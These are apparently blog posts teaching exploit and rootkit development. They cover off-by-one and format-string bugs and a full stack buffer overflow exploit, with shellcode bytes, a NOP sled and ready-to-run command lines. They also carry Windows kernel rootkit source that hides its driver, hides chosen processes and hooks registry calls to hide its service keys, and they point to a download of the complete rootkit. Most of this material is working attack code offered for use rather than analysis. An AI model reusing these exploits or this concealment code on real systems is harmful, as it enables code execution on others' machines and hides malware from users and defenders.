Tuesday, 23 June 2015 00:00

off by one buffer overflow

off by one buffer overflow

Off-by-one vulnerability is a type of buffer overflow that allows you to only modify one byte. It is a result of miscalculation of the buffer length. Below is an example of off-by-one vulnerability in C language:

int get_user(char *user)

{

    char buf[1024];

 

    if(strlen(user) > sizeof(buf))

        die("error: user string too long\n");

 

    strcpy(buf, user);

 

    ...

}

The art of software security assessment, Listing 5-3

Here the strlen function return the size of string but does not consider the null termination character. The strcpy copies the user in buf variable and writes the null byte to the adjacent variable. If compiler does not use any padding the adjacent variable is EBP.

Sometimes because of compiler padding and reordering of variables, exploiting Off-by-one vulnerabilities is not possible but sometimes we can execute arbitrary codes in certain situations although in stack overflow off-by-one vulnerabilities we have no control on ESP. Depending on the compiler ordering of variables you may also have the opportunity to overwrite a specific variable that is vital for an application

Exploiting Off-by-one buffer overflow vulnerability

Exploiting an off-by-one vulnerability really depends to the place of the vulnerable buffer and also other buffers the user has control on. If the variable is just above the EBP (the variable is the first variable after EBP on the stack) the Off-by-one allows us to change the least significant byte of the EBP. This provides us the ability to manipulate the ESP of previous function since in some situations after the function returns the EBP is restored to ESP. Being allowed to alter the stack pointer of a function explicitly can provide us the opportunity to manipulate the EIP. If we change the least significant byte of the EBP so that it points to a buffer controllable by us, we can make up the buffer so that it contains a custom address to be restored as the saved EIP. This custom address can point to another user controllable buffer that contains the shellcode. Bam, after the second function returns, which its ESP points to altered EBP, our arbitrary code is executed.

 off by one stack buffer overflow exploit

Published in Exploit development

Exploit development for Format String vulnerability

Format string vulnerability is the result of wrong usage of format functions in C language. Format string vulnerability is the favorite vulnerability of many exploit writers since it provides arbitrary memory overwrite in contrast to stack based buffer overflows where you are just limited to return address overwrite. Moreover format string vulnerability is less known for developers so the chance to find format string vulnerabilities is much more than a typical stack buffer overflow.

Format String vulnerability

Let’s first see one example of format string vulnerability and then explain what you can do with it:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int main(int argc, char *argv[]) {

char text[1024];

strcpy(text,  argv[1]);

Printf(text)

}

 

This code allows you to inject an input that leads to an arbitrary memory read to write. To see the vulnerability, just run the program with such an argument:

./a.out AAAA%4\$x

 

As you’re running the program with such argument you see that this string is not outputted and instead you get AAAA string + a hexadecimal value in the output.

This is because this string has a special meaning for a c printf format string function. See this format string to understand the concept:

printf("3th: %3$d, first: %1$05d\n", 10, 20, 30);

 

As you see the first parameter of printf tells the formatting of the output. It tells to print out the 3rd argument(%3$) in front of 3th: text as decimal and then printing first argument in front of first: text as a 5 length decimal.

Can you guess what happens if this printf did not have 3 parameters after the format parameter?

The printf still tries to reach the 3rd argument and it prints whatever is on the stack after second parameter (see Figure 1). Reading 3rd argument from the stack leads to reading whatever inserted before calling the printf function.

format string vulnerability stack layout

You may wonder why this happens since 3rd argument seems to be after the argument. Well, when the compiler compiles this code (and every other codes) it pushes the parameters in reverse order. That’s because in the assembly version, printf reads the parameters like this:

mov parameter1, [sp+8] ; reading first parameter

mov parameter2, [sp+12]; reading second parameter

…

 

Please pay attention that stack grows down and adding larger offset to stack pointer leads to reading the bottom of the stack. If you have still trouble understanding the structure of the stack I recommend read this presentation.

Now it should be easy for you to see why AAAA%4\$x string is a simple exploit for the format string vulnerability example I introduced.

Arbitrary memory read exploit for string format vulnerability

If you want to read a specific memory address a simple AAAA%4\$x exploit does not work for you. You need to pass the address of the memory to read and also you need to somehow make the printf to fetch the memory address you passed. Let’s first find a solution for the latter problem. If we pass the address somehow, we tell the printf to read from that address by using pointers. That’s right by modifying the AAAA%4\$x to AAAA%4\$s we simple tell the printf to read the 4th argument and it is a pointer (%s) to an string. Printf stops reading from the pass address when it reaches the string termination character (null character). Ok now we should find a way to read from an address we pass. If you experiment we different lengths instead of 4 in AAAA%4\$x you see that the output is exactly AAAA! This means you made the printf prints the argument string to the Main function. Remember Main arguments are also on the stack and they are at the bottem of the stack. That’s you just need to pass your address instead of AAAA. This is a modified version of the exploit to read from bffffdd7 memory address:

./a.out  $(printf "\xd7\xfd\xff\xbf")%4\$s

 

Arbitrary memory write exploit for string format vulnerability

Writing to a memory address is possible through the %n format parameter. %n tells the printf to write the number of bytes so far written to a pointer parameter. By manipulating the number of bytes read so far and passing the address to be written, we can easily write to a memory address. Although the most powerful robust exploits can be written using this simple method, modern compilers have removed the %n and unfortunately you have little chance to succeed to arbitrary writing using string format vulnerability. Anyhow below is an example of a string format vulnerability:

./ a.out  $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08"

. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

 

 

At first it may seem overwhelming the intention of this exploit, but don’t worry in a sec you understand what’s happening. The first 4 strings after the perl print function is 4 addresses we want to overwrite. The values to be overwritten to these addresses are hex values of:

72

Fd

Ff

Bf

 

If you account the little endianness of the system you probably understand why we want to write these values. Well if successfully overwritten these values consist: bffffd72. We want to write bffffd72 to 08049794. 08049794 points to a 4 byte memory chunk and to write that value we write one of its 4 bytes at a time because bffffd72 is a big number and making n that big leads to writing all of the memory and this certainly causes a crash. Ok to make those 4 values we just can control how many bytes are written. For example look at %98x part of the exploit. This tells the printf to read a value from the stack in hexadecimal and format it to a 98 bytes length so a subsequent %4\$n writes n which is 114 or 0x72 to the 08049794 address. Up to %4\$n, 98 bytes plus the 4 * 4 bytes addresses are written.  After that %139x adds 139 to the 114 so the next value to be written as n is 0xFD. This will be written to the 08049795 and so on.

Conclusion

You see how an arbitrary memory read or write is possible using string overflow vulnerability. You may think this is not as devastating as stack buffer overflow vulnerability, however an arbitrary memory write can lead to a more robust code execution exploit than stack buffer overflow. Just be creative and think of the ways to use this weapon to spawn a shell or execute a command! To name one, you can pass your shellcode instead of using 98 white spaces at the beginning and then write the beginning of shellcode address to a function pointer!

Published in Exploit development

Buffer overflow exploit development

Buffer overflow exploits leverage a special type of bug in software where the buffer to be read or written is not properly managed. Normally an input data larger than the size of the buffer must lead to a fault or crash. However the Art of exploit development is to create a crafted data that not only does it not cause a program crash but also leads to an arbitrary command execution. Although a hacking experience such the one you had in my  Remote Hacking with Metasploit article proves how devastating can a buffer overflow exploit be, you are not a real hacker until you are armed with the knowledge of exploit development.

What is a basic buffer overflow vulnerability?

There are tons of buffer overflow exploit tutorial and even books out there teaching the basic concepts of buffer overflow exploits. A good example is this presentation regarding basic concepts of buffer overflow from syssec. I strongly recommend reading this power point presentation first and then read the rest of this exploit development tutorial. Here I am assuming that you have read this or you have a basic understanding of what buffer overflow is and why it can lead to an arbitrary code execution.

Which programming languages should I know for exploit development?

Generally for identifying a vast portion of buffer overflow vulnerabilities through static code analysis you should be experienced in C and C++, especially you should be comfortable by the pointer concept. Rather than C, a deep knowledge of assembly is also required. Assembly knowledge also is required for Shellcode development (don’t worry you get what shellcode is at the end of this article). The exploit writing itself does not need any programming language although developing exploit with metasploit is strongly recommended. Eventually a scripting language such as Python or Perl can buy you a lot of time for fuzzing to detect the buffer overflow vulnerability and then to write a code snippet to automatically run the exploit.

Buffer overflow example

In my Buffer overflow example article I introduced several buffer overflow examples in C but here I give you a basic example of an unmanaged buffer which can lead to a buffer overflow exploit:

 int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The Art of Exploitation - overflow_example.c

Here the buffer_two is 8 bytes but no size checking is performed before copying the arg1 to it. This means you can input 16 or even more bytes to cause a buffer overflow. If you compile and run this small code you see the effect of a buffer flow. In this case the buffer_one is overwritten by extra bytes. Surprise?! Don’t be, if you had read the basic concepts behind buffer overflow you know that the stack grows down and this means any subsequent variables (in this case buffer_two) in memory are saved before their precedent (buffer_one). If you input a larger string you see that the program crashes. Usually you get a segmentation fault error because of the overflow. The goal of exploit development (for buffer overflow specifically) is to leverage this bug and recieve a shell or command prompt instead of a segmentation fault error or program crash! How fun it will be, right? Be patient we will get to that point. But first let’s review the requirements for exploit development.

Exploit experimentation operating system requirement

10 years ago, exploit writing was much easier than what it is right now. That’s because that time most of the current protections and security mechanisms to prevent a buffer overflow did not exist. If you’re thirsty to know how a simple vulnerable code can be exploited on modern operating systems such as Win 7 or Windows 8 you must be patient and read the articles in the Exploitation category especially Bypass ASLR, DEP and Stack Canary protections article. For now, to understand the concept download an old OS such as Ubunto 7.04 (Fiesty Fawn) that has little to no protection mechanisms. On such operating systems you can see the feasibility of exploitation and learn the basic exploit development concepts and then gradually upgrade your knowledge to hack on modern operating systems.

Why Buffer overflows can lead to an arbitrary code execution?

To answer this question we must know how a program is executed. A program is a collection of functions and depending on the algorithm of the program, the Main function executes other functions. “Main” function is the entry point of an application and when you click an executable, the statements in the Main function are executed one by one. A statement can be a call to a function and the called function can call another function in itself. This function calling mechanism has no limit so how does operating system keep track of the instructions to execute?! I mean after a function execution is done how operating system should know what is the next instruction after the called function? Well, a fast method for operating system to keep such data is to keep the next instruction address exactly where it stores the variables and function’s parameters. That place is the stack and again to see its structure I recommend read this presentation. The “next instruction address” after execution of a function is stored on top of all the function variables. This means any buffer vulnerable to buffer overflow in a function is beneath the saved Extended Instruction Pointer (EIP). In other words an overflow on any variable in a function can potentially overwrite the next instruction address or saved EIP on the stack.

How can we successfully overwrite the EIP?

If you have played with the buffer overflow example you see that extending the input finally leads to the program crash. When the crash happens, you have overwritten the EIP. But for a successful exploitation you need to know exactly how many bytes are needed to overwrite the EIP. Well I introduce two methods here. First using a debugger and second by experimentation.

Finding the exact bytes to overwrite the EIP using debugger

In this method we know the value of EIP and we just want to see how far it is located from our buffer. Let’s modify the buffer overflow example a little bit:

#include <stdio.h>

#include <string.h>

void copy_buffer(char buffer[],char argv[]) {

                strcpy(buffer, argv);

}

 

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));

                copy_buffer(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The only difference is that we used copy_buffer function to copy the program arguments. Here we know that the next instruction after the copy_buffer is line 41. So after this function, the execution flow should return to the address of this instruction. By setting a breakpoint on copy_buffer line in Main and examining its address we are able to locate it in copy_buffer function. The simplest method is to set another breakpoint on line 9 just before  copy_buffer function returns. Then we examine the stack (64 bytes or more) and see where the return address value and our input placed. That’s it the distance between these two addresses show the exact required bytes to overwrite the saved EIP.

Finding the exact bytes to overwrite the EIP by experimentation

The goal here is to automate the task of running the program with different length inputs and see when it crashes. A python script can easily do such a task but here I show you a linux BASH script to do so:

 

$ for i in $(seq 1 100)

> do

> echo Trying offset $i

> ./a.out $(perl –e “print ‘AAAA’x$i“)

> done

 

Whenever you see the first segmentation fault you find the exact offset.

After finding the exact offset by repeating AAAA offset times you can successfully overwrite the EIP by the 0x41414141 value.

How can we execute our arbitrary command by overwriting the EIP?

Overwriting the EIP by a custom valid address means redirecting the execution to a code you want. Immediately you may ask redirecting execution where? You’re writing to a buffer, remember? So not just you’re overflowing the buffer to overwrite the saved EIP on the stack but also you write your code to that buffer. Thus the only barrier is to find the address of that buffer you overwrite so that you will be able to write this address on the saved EIP and bam, the program executes the code as input! This code is known as SHELLCODE.

What is NOP slide?

Finding the address of the buffer where you inject the SHELLCODE is not that easy. There are a lot of factors involved that can change the address of the buffer in different situations. Moreover the address should exactly points to the beginning of the SHELLCODE. So if any factor changes the address even by one byte, the SHELLCODE is not executed completely and the program crashes. To minimize the complexity of finding the exact return address (the address of the buffer) we place NOP instructions at the beginning of the SHELLCODE. When CPU sees a NOP instruction it simple does nothing. Thus if any factors change, the address points to somewhere between the NOP instructions (known as NOP slide) and the CPU executes NOPs one after the other until it reaches the SHELLCODE. The layout of our exploit is as shown in Figure 1:

layout of a buffer overflow exploit

Figure 1

 How to find the return address that points to the SHELLCODE?

The quick answer is using a debugger to find the address of the buffer that holds the input. When you audit an open source code or a simple example like the one in this tutorial you can easily find the address by using the variable name in the debugger.

  1. In Linux, gdb is the best and this task is as easy as attaching to the process:
gdb -q --pid=[PROCESS-ID] --symbols=[OUTPUT-FILE]

 

  1. Process Id can be retrieved using ps command and the output file is whatever name you give while compiling with gcc. After attaching to the process you can get the address of the buffer using this command:
x/x [VARIABLE-NAME]

 

In windows, it is even easier using WinDbg or Immunity debugger:

  1. You must first place your .pdb file in a location and point to it using this menu:

File-->Symbol File path

  1. And then you attach to the process using this menu:

File-->Attach to process

  1. And then view the variable address using:

View-->Watch

  1. Here you type the name of your variable.

If you do not have the symbol file and the source code, don’t worry! You can search for the input and retrieve the address of the beginning of the buffer. For example in WinDbg with Mona.py installed finding an AAAAAAAAA input pattern is as easy as:

!mona find -type asc -s "AAAAAAAAA"

SHELLCODE

Figure 2 shows a SHELLCODE:

SHELLCODE

Figure 2

These bytes if executed will spawn a bash shell for you. But in order to be executed you should inject them by the preceding NOP sled to the program. One important factor for a successful exploitation is the vulnerable buffer length. You can overflow and overwrite the EIP even with a 8 bytes buffer such as the one in our buffer overflow example though it needs a lot of experience and knowledge. We want to input our SHELLCODE + NOP Sled to the buffer so our buffer should be at least that big. Because of this we modify our buffer overflow example like this:

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[250];

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

}

 

Now our vulnerable buffer is big enough that we can input a data that contains our NOP sled + SHELLCODE + Repeated Return Address

Building the exploit

Ok, so far you saw a vulnerable program to buffer overflow exploit. Then you learned that any vulnerable buffer allows you to overwrite the return address on the stack. Afterward you learned that you can purposely overwrite the return address so that it points to a SHELLCODE you input to the buffer. Finally you’ve learned how to find the address of the SHELLCODE at the buffer and add some NOPs to increase precision. Now it is time to see how we build an exploit using this info.

  1. In Linux we build the NOP sled like this:
$(perl -e 'print "\x90"x200')

 

This builds 200 NOP consecutive instructions for us.

  1. Then we build our SHELLCODE like this:
 Export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80")

 

The string is hexadecimal representation of binary codes to spawn a bash shell for us.

  1. Finally assuming the address of vulnerable buffer is 0xbffff5c0, we repeat the address of 0xbffff624 10 times. That’s right we do not repeat the buffer address but we repeat 0xbffff5c0 + 100! Because 100 bytes after it we are in the middle of NOP instructions and it is a safe guess even if the buffer address is altered by a factor. Why 10 times? That depends to the buffer length (here 250), NOP Sled size and the offset of the buffer to the saved EIP. Remember that the goal is to overflow the buffer and overwrite the EIP so if 10 does not work for you once again you can run the BASH script to find the offset and calculate the length of Repeated Return Addresses:
$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

Did you notice? The address is in reverse order! That’s because an Intel 32 bit architecture like the Ubunto 7.04 (Fiesty Fawn) is little endian and this means the least significant bit is placed at the higher address.

  1. Finally our exploit can be run:
./a.out $(perl -e 'print "\x90"x200') $(echo $SHELLCODE)$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

Or the exploit can be saved in a local environment variable like this:

Export EXPLOIT=$(perl -e 'print "\x90"x200') $(echo $SHELLCODE)$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

You can also save the exploit to a file:

Echo $EXPLOIT > example_exploit

 

 Or you can run the exploit in future by:

./a.out $(echo $EXPLOIT)

 

Or:

./a.out $(cat example_exploit)

 

 

Published in Exploit development
Thursday, 04 June 2015 00:00

Rootkit concealment part 2

Rootkit concealment part 2

In my previous article: Rootkit concealment part 1 I talked about the methods to hide the registry keys and directories. In this article methods to hide the drivers and processes are discussed. In both cases the logic behind the concept is the same although kernel data structures to alter are different. The overall Idea is to find the linked list by which OS keeps track of the running processes or drivers using the process or driver data OS gives us while querying. After locating the processes or drivers linked list we modify the linked list so that our process or driver is removed from the list.

Driver hiding c++ source code

In the DriverEntry function of the driver the OS passes us the PDRIVER_OBJECT. Using this object we can locate the Drivers DRIVER_DATA Linked List. This data structure uses the typical forward and backward pointers to access the next and previous drivers. Hiding the driver (in this case the rootkit) is as easy as modifying the previous and next links of objects after our driver object in the linked list. Figure 1 shows the concept:

driver and process hiding

Figure 1

The source code to do this is:

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

                DRIVER_DATA* driverData;

                ...

 

                // Hide this driver

                driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));

                if( driverData != NULL )

                {

                                // unlink this driver entry from the driver list

                                *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;

                                driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;

                }

                ...

 

                return STATUS_SUCCESS;

}

 

Process hiding c++ source code

As discussed in the beginning of this article the idea behind the driver and process hiding is the same, however there are design and implementation differences in the process hiding. The rootkit base itself is a driver but there may be other executable with the rootkit that need to be hided. To hide an executable, the executable calls the driver and passes its process id. Here is the code to call the driver and passing the process id:

control.processId = GetCurrentProcessId();

deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,

  GENERIC_READ | GENERIC_WRITE,

  0,

  NULL,

  OPEN_EXISTING,

  FILE_ATTRIBUTE_NORMAL,

  NULL);

 

  if( DeviceIoControl(deviceHandle,

   GHOST_HIDE_COMMAND,

   &control,

   sizeof(control), // input

   (PVOID)&control,

   sizeof(control), // output

   &status,

   NULL ) )

   printf ("MyDeviceDriver hiding this process (0x%x).\n",

    control.processId );

 

Then the driver receives this call in its dispatch method (because in the DriverEntry function we had set OnDispatch to process all the requests to our driver). After that the driver finds the Processes linked list (KPControlBlock) using PsGetCurrentProcess API + an offset (the offset depends to the OS) and locate the process entry in the list using the pass Process id and modify the linked list to hide the process.

 

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

                DRIVER_DATA* driverData;

                ...

 

                // Route standard I/O through our dispatch routine

                for(loop = 0; loop < IRP_MJ_MAXIMUM_FUNCTION; loop++)

                                pDriverObject->MajorFunction[loop] = OnDispatch;

                ...

 

                return STATUS_SUCCESS;

}

 

// Process I/O

NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )

{

                PIO_STACK_LOCATION irpStack;

                ...

                // Get the IRP stack

                irpStack = IoGetCurrentIrpStackLocation (Irp);

                ...

                switch (irpStack->MajorFunction)

                {

                                case IRP_MJ_DEVICE_CONTROL:

                                                status = OnDeviceControl( irpStack->FileObject, TRUE,

                                                                                inputBuffer, inputBufferLength,

                                                                                outputBuffer, outputBufferLength,

                                                                                ioControlCode, &Irp->IoStatus, DeviceObject );

                                                break;

                }

...

}

// Process commands from external applications

NTSTATUS  OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,

                PVOID InputBuffer, ULONG InputBufferLength,

                PVOID OutputBuffer, ULONG OutputBufferLength,

                ULONG IoControlCode, PIO_STATUS_BLOCK IoStatus,

                PDEVICE_OBJECT DeviceObject )

{

                ...

               

                switch ( IoControlCode )

                {

                ...

 

                                case GHOST_HIDE_COMMAND:

                                                if ( InputBufferLength >= sizeof(GHOST_IOCTLDATA) )

                                                {

                                                                pControlData = (GHOST_IOCTLDATA*)InputBuffer;

                                                                eProcess = findProcess( pControlData->processId );

                                                                if( eProcess != 0 )

                                                                {

                                                                                // Hide the process

                                                                                processList = (LIST_ENTRY *)(eProcess + listOffset );

                                                                                if( processList && processList->Flink && processList->Blink)

                                                                                {

                                                                                                *((DWORD *)processList->Blink) = (DWORD) processList->Flink;

                                                                                                *((DWORD *)processList->Flink + 1) = (DWORD) processList->Blink;

                                                                                                processList->Flink = (LIST_ENTRY *)&(processList->Flink);

                                                                                                processList->Blink = (LIST_ENTRY *)&(processList->Flink);                                                                                                                                                           

                                                                                }

                                                                                else

                                                                                {

                                                                                                DbgPrint("comint32: Error finding process 0x%x",

                                                                                                                pControlData->processId);

                                                                                }

                                                                }

                                                                else

                                                                {

                                                                                DbgPrint("comint32: Could not find process 0x%x",

                                                                                                pControlData->processId);

                                                                }

                                                }

                                                return IoStatus->Status;

 

 

                                default:

                                                IoStatus->Information = 0;

                                                IoStatus->Status = STATUS_NOT_SUPPORTED;

                                                return IoStatus->Status;

                }

                return STATUS_SUCCESS;

}

DWORD findProcess ( DWORD targetProcessId )

{

                int loop = 0;

                DWORD eProcess;

                DWORD firstProcess;

                DWORD nextProcess;

                PLIST_ENTRY processList;

 

                if ( targetProcessId == 0 )

                                return 0;

 

                // Get the process list

                eProcess = (DWORD)PsGetCurrentProcess();

                // Traverse the process list

                firstProcess = *((DWORD*)(eProcess + (listOffset - 4))); //The process list is in eProcess + listOffset but here we acquired the first process's ID

                nextProcess = firstProcess;

                for(;;)

                {

                                if(targetProcessId == nextProcess)

                                {

                                                // found the process

                                                break;

                                }

                                else if( loop && (nextProcess == firstProcess) ) //Loop insures that we are in the loop not in the loop start

                                {

                                                // circled without finding the process

                                                eProcess = 0;

                                                break;

                                }

                                else

                                {

                                                // get the next process

                                                processList = (LIST_ENTRY*)(eProcess + listOffset);

                                                if( processList->Flink == 0 )

                                                {

                                                                DbgPrint ("comint32: findProcess no Flink!");

                                                                break;

                                                }

                                                eProcess = (DWORD)processList->Flink;

                                                eProcess = eProcess - listOffset; //This and the next line is suspicious! why not just using eProcess - 4?! Anyway from the Flink which is the pointer to the process's list we retrieve the process's ID

                                                nextProcess = *((DWORD*)(eProcess + (listOffset - 4)));

                                }

                                loop++;

                }

 

                return eProcess;

}

 

The complete rootkit source code and a compiled version of two rootkit concealment parts can be downloaded here.

Published in Rootkit development
Thursday, 04 June 2015 00:00

Rootkit concealment part 1

Rootkit concealment part 1

Rootkit concealment is really a broad topic and in this and the next Rootkit concealment article I can just touch on this subject. In order to clean the traces of malware like rootkit, so many OS kernel functions and data structures need be hooked to alter. A complete solution may also require removal of installation files and the change logs that the installation has caused to be created. Here in the first part of my Rootkit concealment article I introduce methods for registry key and directory hiding. In the Rootkit concealment part 2 I explains methods of hiding the driver and process.

In my kernel hooks article I explained how to modify system descriptor table in order to place a kernel hook. In the User mode hooking article I introduce one usage of kernel hooks by manipulating a process function using ZWMapViewOfSection. Here in this article you to alter kernel function you see hooking of 4 other kernel APIs.

Registry hiding c++ source code

One of the traces a malware like rootkits leaves is in registry under the “Services” key. Services key keeps records for all the services and drivers and that are installed on the system. To hide the rootkit from the user (and the system) you must alter the OS mechanism of retrieving registry keys. In order to do that you must hook ZwOpenKey, ZwQueryKey and NewZwEnumerateKey. ZwOpenKey function opens and loads the registery key. ZwQueryKey returns the information about the key which the most useful one is the Length of its sub keys. NewZwEnumerateKey is used to get a subkey of a key. By hooking these functions and altering them we manipulate the registry retrieval mechanism so that we never return information about the hidden keys.

Registries records are essential data for OS because OS keeps all the configuration and permanent data in it. Registries are kept in a tree-like data structure i.e. there is a root key and other data are the sub keys of this root key and this continues to the end. When the user opens the registry editor and wants to see what’s in the Services key, registry editor first asks the OS to open the Services key. Then it queries the number of sub keys and after that it iterates over the length to retrieve each subkey by its index. In order to hide the key of our rootkit driver we alter the ZwQueryKey to return the number of sub keys one less than the real number and then when the registry editor asks for the index of our hidden key we return the result of next key.

To clarify the concept let’s examine an example. Suppose the Services key has 12 records under it and we want to hide two registry keys. First we tell registry editor that it has 10 records and then when it queries sub keys of this key using their indexes we return all the records except the hidden keys but doing this is a little tricky. The index of keys we want to hide could be anything so when we tell the regedit that we have 10 records it starts querying the OS kernel form index 1 to 10. Suppose the index of our hidden key is 6. If we allow regedit to query index 6 nothing is going to be hidden. Thus when the regedit asks for 6 we return 7. Suppose another hidden key is 10. Here for 10 it is a little more complex. If the regedit asks for 10 we can return 11 but what do we return when regedit asks for 9? Because we returned 7 for 6 we had to return the asked index + 1 for all other indexes after 6 because if we return for example 7 for 7 we have showed a key twice and it cause other problems! So if here we return 9 + 1=10 we unwantedly returned the info about the hidden key. Therefor we have to return 11 for 9 and then 12 for 10.

Now that you have a perspective of what is going to happen I go to details. To return those fake indexes to hide our hidden registry keys we must build a tree data structure to keep track of keys and their new indexes. The data structure is this:

// key data structures

typedef struct _KEY_HANDLE //This and the next structures are just for us to keep track of the hidden keys and return crafted values from it to the system.

{

                HANDLE               handle;

                PVOID   keyData;

                struct _KEY_HANDLE *previous;

                struct _KEY_HANDLE *next;

} KEY_HANDLE;

typedef struct _REG_KEY_DATA

{

                ULONG subkeys;

                SUBKEY_DATA* subkeyData;

} REG_KEY_DATA;

 

typedef struct _SUBKEY_DATA

{

                ULONG subkeyIndex;

                ULONG newIndex;

                struct _SUBKEY_DATA *next;

} SUBKEY_DATA;

 

To create these new indexes for the Services we hook NewZwOpenKey. We just build our tree for the “Services” subkeys but if you want to hide other keys you must build the tree data for other keys too. Remember that building such tree structure is very time consumable so being a precise as possible is really essential. As a matter of fact in rootkit development you should always do as little as required:

// create an index that skips hidden subkeys

// when the parent key is \\Services

NTSTATUS NewZwOpenKey( OUT PHANDLE KeyHandle, //In this hooked function we just create our own view of registery keys and their indexes(crafted ones to hide those keys we want) and keep it in a global variable g_keyList.

                IN ACCESS_MASK DesiredAccess,

                IN POBJECT_ATTRIBUTES ObjectAttributes )

{

    int status;

 

                status = OldZwOpenKey(

                                KeyHandle,

                                DesiredAccess,

                                ObjectAttributes );     

 

                if( status == STATUS_SUCCESS )

                {

                                // get the name of the key

                                PUNICODE_STRING pKeyName = NULL;

                                UNICODE_STRING servicesString = { 0 };

                                RtlInitUnicodeString( &servicesString, L"Services" );

                                GetKeyName( *KeyHandle, &pKeyName );

                                // create special index for the Services key                                                                                                         

                                if( pKeyName )

                                {

                                                // Using IsSameFile as IsSameKey function

                                                if( IsSameFile( &servicesString, pKeyName ) ) // Using IsSameFile because a registery name is much like a full path file name. [HKEY_LOCAL_MACHINE]\CurrentControlSet\....\Alex

                                                {

                                                                DbgPrint("comint32: found g_servicesKey");

                                                                CreateHiddenKeyIndices( *KeyHandle );

                                                }

                                                ExFreePool( pKeyName );

                                }

                }

 

                return status;

}

 

 

The CreateHiddenKeyIndices intend to build the mentioned data structure. To do that it enumerates the subkeys of the KeyHandle to see if any of the subkeys is our intended hidden keys by comparing their names to the name of our rootkit driver and two other crafted values (defined to just show the concept). If we find one of the hidden keys we mark it by filling the new index variable with realIndex + offset; If not we just set the new index equal to the real index.

// create a key list with index data that skips hidden keys

int CreateHiddenKeyIndices( HANDLE hKey )

{

                int status;

                int index = 0;

                int offset = 0;

                int visibleSubkeys = 0;

    PVOID pInfoStruct;

    ULONG infoStructSize;

    ULONG resultLength;

                KEY_HANDLE* pKeyHandle = 0;

 

                pKeyHandle = FindKeyHandle( hKey );

 

                // remove old sub key data if it exists

                if( pKeyHandle )

                                FreeKeyHandle( hKey ); //This function does not free the memory, it just removes the hKey from the g_keyList global list by changing the previous and the next pointer

                pKeyHandle = AllocateKeyHandle( hKey ); //Allocate a KEY_HANDLE structure and set the hKey for its HANDLE

               

                // size must be larger than any of the info structures

                infoStructSize = 256;

                pInfoStruct = ExAllocatePool( PagedPool, infoStructSize );

 

    if ( pInfoStruct == NULL )

        return -1;

 

                // enumerate subkeys

                for(;;) //this loops goes over all of the subkeys possible and break if status returned by ZwEnumerateKey is not success (No more sub keys)

                {

                                status = ZwEnumerateKey( //The ZwEnumerateKey routine returns information about a subkey of an open registry key

                                                                hKey, //Handle to the registry key that contains the subkeys to be enumerated

                index,  //The index of the subkey that you want information for. If the key has n subkeys, the subkeys are numbered from 0 to n-1

                KeyBasicInformation, //Specifies a KEY_INFORMATION_CLASS enumeration value that determines the type of information to be received

                pInfoStruct,  //Pointer to a caller-allocated buffer that receives the requested information

                infoStructSize, // size of buffer

                &resultLength); //Pointer to a variable that receives the size, in bytes, of the registry-key information

 

                                if( status == STATUS_SUCCESS )

                                {

                                                // Add one compare for each hidden key defined

                                                if( !wcsncmp( //Compare characters of two strings, using the current locale or a specified locale. even wide or multiple

                                                                                                ((KEY_BASIC_INFORMATION*)pInfoStruct)->Name,

                                                                                                g_key1,

                                                                                                SERVICE_KEY1_LENGTH) ||

                                                                !wcsncmp(

                                                                                                ((KEY_BASIC_INFORMATION*)pInfoStruct)->Name,

                                                                                                g_key2,

                                                                                                SERVICE_KEY2_LENGTH) ||

                                                                !wcsncmp(

                                                                                                ((KEY_BASIC_INFORMATION*)pInfoStruct)->Name,

                                                                                                g_key3,

